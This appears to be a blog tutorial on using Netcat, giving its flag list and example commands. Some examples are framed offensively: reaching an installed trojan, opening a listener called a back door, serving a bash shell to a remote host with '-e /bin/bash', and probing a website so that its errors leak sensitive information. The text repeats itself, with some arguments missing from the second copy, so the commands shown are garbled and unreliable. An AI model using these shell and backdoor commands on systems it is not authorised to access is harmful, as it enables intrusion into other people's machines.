How to use Netcat..?
Browse to the folder in the command prompt (using cd command) to where you have placed your netcat exe file
After this, you can just type in nc at cmd prompt to use it,
For an example, if you wanted to access a trojan you installed, you would use the command
nc -v
Basic Netcat commands
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host
Connect to multiple
ports on a remote host
nc remote_host...
For example:
nc www.mysite.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p
Connect to remote host
and serve a bash shell
nc remote_ip -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Pipe command output
to a netcat request
| nc remote_host
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.mysite.com 80
Spoofed HTTP Probes
nc www.mysite.com
user agent : swar Browser
Referrer : abc.com
enter
enter
this will generate an error message which will display sensitive info about the target website
What are the applications of NetCat..?
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host
Connect to multiple
ports on a remote host
nc remote_host
For example:
nc www.mysite.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p
Connect to remote host
and serve a bash shell
nc remote_ip
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Pipe command output
to a netcat request
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.mysite.com 80
nc www.mysite.com
What are the applications of NetCat..?
Listening to a port
connecting to a port
File transfer
Chatting
Executing applications
sending spoofed HTTP Probes
Proxy servers
Port scanning
TIPS :
There are better softwares for port scanning.But for a thorough start we can use Netcat first.
To download :
Netcat (windows)
Netcat (unix)
No comments:
Post a Comment